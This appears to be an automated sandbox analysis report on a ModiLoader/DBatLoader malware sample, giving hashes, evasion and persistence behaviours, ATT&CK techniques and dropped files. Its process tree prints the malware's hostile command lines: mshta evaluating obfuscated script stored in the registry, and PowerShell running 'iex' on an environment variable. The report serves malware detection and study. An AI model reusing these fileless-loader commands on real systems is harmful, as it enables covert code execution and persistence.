Analysis

  • max time kernel
    150s
  • max time network
    156s
  • platform
    windows7_x64
  • resource
    win7-20240221-en
  • resource tags

    arch:x64arch:x86image:win7-20240221-enlocale:en-usos:windows7-x64system
  • submitted
    03-06-2024 17:26

General

  • Target

    929a3ecf9b2e6067650d796a02be3d2f_JaffaCakes118.exe

  • Size

    471KB

  • MD5

    929a3ecf9b2e6067650d796a02be3d2f

  • SHA1

    667e62fba674f62099d116d5d5c724c2f55b3652

  • SHA256

    9d20f3273d67668fcf59d481d680f4bd4581373c90d7c91b4854666365bcab03

  • SHA512

    54ed879d5b6418e890408e14c858f201cc49356c8b3acb4cf8e10f529b05c6c082af217dc50445f0bd2e63e6e1e8761fb1debcca2c23f8e704f63afe577169e2

  • SSDEEP

    12288:xixkSFttgCCqf1aqc+b1YAUI11TJUjzPH:4PfgCCEaq917UYSv

Malware Config

Signatures

  • ModiLoader, DBatLoader

    ModiLoader is a Delphi loader that misuses cloud services to download other malicious families.

  • Process spawned unexpected child process 1 IoCs

    This typically indicates the parent process was compromised via an exploit or macro.

  • Checks for common network interception software 1 TTPs

    Looks in the registry for tools like Wireshark or Fiddler commonly used to analyze network activity.

  • Looks for VirtualBox Guest Additions in registry 2 TTPs 1 IoCs
  • Looks for VirtualBox drivers on disk 2 TTPs 1 IoCs
  • ModiLoader Second Stage 55 IoCs
  • Looks for VMWare Tools registry key 2 TTPs 1 IoCs
  • Checks BIOS information in registry 2 TTPs 2 IoCs

    BIOS information is often read in order to detect sandboxing environments.

  • Deletes itself 1 IoCs
  • Adds Run key to start application 2 TTPs 1 IoCs
  • Maps connected drives based on registry 3 TTPs 2 IoCs

    Disk information is often read in order to detect sandboxing environments.

  • Drops file in System32 directory 1 IoCs
  • Suspicious use of SetThreadContext 2 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • Modifies Internet Explorer settings 1 TTPs 2 IoCs
  • Modifies registry class 7 IoCs
  • Suspicious behavior: EnumeratesProcesses 64 IoCs
  • Suspicious behavior: MapViewOfSection 2 IoCs
  • Suspicious use of AdjustPrivilegeToken 1 IoCs
  • Suspicious use of WriteProcessMemory 20 IoCs

Processes

  • C:\Users\Admin\AppData\Local\Temp\929a3ecf9b2e6067650d796a02be3d2f_JaffaCakes118.exe
    "C:\Users\Admin\AppData\Local\Temp\929a3ecf9b2e6067650d796a02be3d2f_JaffaCakes118.exe"
    1⤵
      PID:2348
    • C:\Windows\system32\mshta.exe
      "C:\Windows\system32\mshta.exe" javascript:gFCydP37f="CI9Vd1";Lo8=new%20ActiveXObject("WScript.Shell");HOzbw3r="0pf9V9p";I9jPV=Lo8.RegRead("HKCU\\software\\DRGG1us\\HFyoJ3vHWd");TW8HU="Kw5oSBJN";eval(I9jPV);Pa9AUqBT="fTu";
      1⤵
      • Process spawned unexpected child process
      • Suspicious use of WriteProcessMemory
      PID:2632
      • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        "C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" iex $env:dyeww
        2⤵
        • Drops file in System32 directory
        • Suspicious use of SetThreadContext
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious behavior: MapViewOfSection
        • Suspicious use of AdjustPrivilegeToken
        • Suspicious use of WriteProcessMemory
        PID:2704
        • C:\Windows\SysWOW64\regsvr32.exe
          regsvr32.exe
          3⤵
          • Looks for VirtualBox Guest Additions in registry
          • Looks for VirtualBox drivers on disk
          • Looks for VMWare Tools registry key
          • Checks BIOS information in registry
          • Deletes itself
          • Adds Run key to start application
          • Maps connected drives based on registry
          • Suspicious use of SetThreadContext
          • Modifies Internet Explorer settings
          • Modifies registry class
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious behavior: MapViewOfSection
          • Suspicious use of WriteProcessMemory
          PID:520
          • C:\Windows\SysWOW64\regsvr32.exe
            "C:\Windows\SysWOW64\regsvr32.exe"
            4⤵
              PID:1996

      Network

      MITRE ATT&CK Matrix ATT&CK v13

      Persistence

      Boot or Logon Autostart Execution

      1
      T1547

      Registry Run Keys / Startup Folder

      1
      T1547.001

      Privilege Escalation

      Boot or Logon Autostart Execution

      1
      T1547

      Registry Run Keys / Startup Folder

      1
      T1547.001

      Defense Evasion

      Virtualization/Sandbox Evasion

      3
      T1497

      Modify Registry

      2
      T1112

      Discovery

      Software Discovery

      1
      T1518

      Query Registry

      4
      T1012

      Virtualization/Sandbox Evasion

      3
      T1497

      File and Directory Discovery

      1
      T1083

      System Information Discovery

      3
      T1082

      Peripheral Device Discovery

      1
      T1120

      Replay Monitor

      Loading Replay Monitor...

      Downloads

      • C:\Users\Admin\AppData\Local\26ada5\38e275.bat
        Filesize

        70B

        MD5

        0e77c6f2de323213d78efc4fc1f0a454

        SHA1

        4ca49b8efe1dfb1261261b03208a4f38677d2a27

        SHA256

        6f69645d0013b4f821adf8ee1b8eb8f2528f3e4e0ee68b1d0b3b8e740963db28

        SHA512

        ccc5acdb9c34b2f51e6c7824059c6f9f240a4749436eaaca93958a19cc2529f9c953b01851f871d8d0c8b75cf4a6d6f0ddee6a35ed70ebef087a10ae0f6b5d30

      • C:\Users\Admin\AppData\Local\26ada5\82963c.8aa1d52
        Filesize

        3KB

        MD5

        20a150dee79f2b8f1b82b91121ceee71

        SHA1

        d1cd3a5744cf8062ed80311e943b91e414d361b5

        SHA256

        a512cdcd1d5c114b0862f4de2c0c73fdb5b5cabef75872ef80eb8d5511f21036

        SHA512

        95b01111683699557e39b19739044241fbaa6971f1386dde7e4d46ec3afce7cb23b84192f714e65a3a99be7e94ba22d324b7dfcfbbca47b9b6be8c157575a728

      • memory/520-31-0x0000000000090000-0x00000000001DA000-memory.dmp
        Filesize

        1.3MB

      • memory/520-50-0x0000000000090000-0x00000000001DA000-memory.dmp
        Filesize

        1.3MB

      • memory/520-52-0x0000000000090000-0x00000000001DA000-memory.dmp
        Filesize

        1.3MB

      • memory/520-53-0x0000000000090000-0x00000000001DA000-memory.dmp
        Filesize

        1.3MB

      • memory/520-30-0x0000000000090000-0x00000000001DA000-memory.dmp
        Filesize

        1.3MB

      • memory/520-54-0x0000000000090000-0x00000000001DA000-memory.dmp
        Filesize

        1.3MB

      • memory/520-51-0x0000000000090000-0x00000000001DA000-memory.dmp
        Filesize

        1.3MB

      • memory/520-25-0x0000000000090000-0x00000000001DA000-memory.dmp
        Filesize

        1.3MB

      • memory/520-32-0x0000000000090000-0x00000000001DA000-memory.dmp
        Filesize

        1.3MB

      • memory/520-21-0x0000000000090000-0x00000000001DA000-memory.dmp
        Filesize

        1.3MB

      • memory/520-17-0x0000000000090000-0x00000000001DA000-memory.dmp
        Filesize

        1.3MB

      • memory/520-20-0x0000000000090000-0x00000000001DA000-memory.dmp
        Filesize

        1.3MB

      • memory/520-22-0x0000000000090000-0x00000000001DA000-memory.dmp
        Filesize

        1.3MB

      • memory/520-27-0x0000000000090000-0x00000000001DA000-memory.dmp
        Filesize

        1.3MB

      • memory/520-29-0x0000000000090000-0x00000000001DA000-memory.dmp
        Filesize

        1.3MB

      • memory/520-35-0x0000000000090000-0x00000000001DA000-memory.dmp
        Filesize

        1.3MB

      • memory/520-39-0x0000000000090000-0x00000000001DA000-memory.dmp
        Filesize

        1.3MB

      • memory/520-40-0x0000000000090000-0x00000000001DA000-memory.dmp
        Filesize

        1.3MB

      • memory/520-48-0x0000000000090000-0x00000000001DA000-memory.dmp
        Filesize

        1.3MB

      • memory/520-49-0x0000000000090000-0x00000000001DA000-memory.dmp
        Filesize

        1.3MB

      • memory/520-43-0x0000000000090000-0x00000000001DA000-memory.dmp
        Filesize

        1.3MB

      • memory/520-42-0x0000000000090000-0x00000000001DA000-memory.dmp
        Filesize

        1.3MB

      • memory/520-41-0x0000000000090000-0x00000000001DA000-memory.dmp
        Filesize

        1.3MB

      • memory/520-37-0x0000000000090000-0x00000000001DA000-memory.dmp
        Filesize

        1.3MB

      • memory/520-28-0x0000000000090000-0x00000000001DA000-memory.dmp
        Filesize

        1.3MB

      • memory/520-36-0x0000000000090000-0x00000000001DA000-memory.dmp
        Filesize

        1.3MB

      • memory/520-34-0x0000000000090000-0x00000000001DA000-memory.dmp
        Filesize

        1.3MB

      • memory/520-33-0x0000000000090000-0x00000000001DA000-memory.dmp
        Filesize

        1.3MB

      • memory/520-23-0x0000000000090000-0x00000000001DA000-memory.dmp
        Filesize

        1.3MB

      • memory/520-24-0x0000000000090000-0x00000000001DA000-memory.dmp
        Filesize

        1.3MB

      • memory/520-38-0x0000000000090000-0x00000000001DA000-memory.dmp
        Filesize

        1.3MB

      • memory/520-26-0x0000000000090000-0x00000000001DA000-memory.dmp
        Filesize

        1.3MB

      • memory/1996-72-0x0000000000270000-0x00000000003BA000-memory.dmp
        Filesize

        1.3MB

      • memory/1996-63-0x0000000000270000-0x00000000003BA000-memory.dmp
        Filesize

        1.3MB

      • memory/1996-68-0x0000000000270000-0x00000000003BA000-memory.dmp
        Filesize

        1.3MB

      • memory/1996-69-0x0000000000270000-0x00000000003BA000-memory.dmp
        Filesize

        1.3MB

      • memory/1996-70-0x0000000000270000-0x00000000003BA000-memory.dmp
        Filesize

        1.3MB

      • memory/1996-64-0x0000000000270000-0x00000000003BA000-memory.dmp
        Filesize

        1.3MB

      • memory/1996-73-0x0000000000270000-0x00000000003BA000-memory.dmp
        Filesize

        1.3MB

      • memory/1996-74-0x0000000000270000-0x00000000003BA000-memory.dmp
        Filesize

        1.3MB

      • memory/1996-66-0x0000000000270000-0x00000000003BA000-memory.dmp
        Filesize

        1.3MB

      • memory/1996-65-0x0000000000270000-0x00000000003BA000-memory.dmp
        Filesize

        1.3MB

      • memory/1996-71-0x0000000000270000-0x00000000003BA000-memory.dmp
        Filesize

        1.3MB

      • memory/1996-67-0x0000000000270000-0x00000000003BA000-memory.dmp
        Filesize

        1.3MB

      • memory/2348-9-0x0000000000310000-0x00000000003EC000-memory.dmp
        Filesize

        880KB

      • memory/2348-0-0x0000000000472000-0x0000000000474000-memory.dmp
        Filesize

        8KB

      • memory/2348-3-0x0000000000400000-0x000000000047F3BC-memory.dmp
        Filesize

        508KB

      • memory/2348-2-0x0000000000310000-0x00000000003EC000-memory.dmp
        Filesize

        880KB

      • memory/2348-61-0x0000000000310000-0x00000000003EC000-memory.dmp
        Filesize

        880KB

      • memory/2348-1-0x0000000000400000-0x000000000047F3BC-memory.dmp
        Filesize

        508KB

      • memory/2348-8-0x0000000000310000-0x00000000003EC000-memory.dmp
        Filesize

        880KB

      • memory/2348-7-0x0000000000310000-0x00000000003EC000-memory.dmp
        Filesize

        880KB

      • memory/2348-14-0x0000000000472000-0x0000000000474000-memory.dmp
        Filesize

        8KB

      • memory/2348-4-0x0000000000310000-0x00000000003EC000-memory.dmp
        Filesize

        880KB

      • memory/2348-5-0x0000000000310000-0x00000000003EC000-memory.dmp
        Filesize

        880KB

      • memory/2704-19-0x0000000005C50000-0x0000000005D2C000-memory.dmp
        Filesize

        880KB

      • memory/2704-16-0x0000000005C50000-0x0000000005D2C000-memory.dmp
        Filesize

        880KB

      • memory/2704-15-0x0000000002830000-0x0000000002831000-memory.dmp
        Filesize

        4KB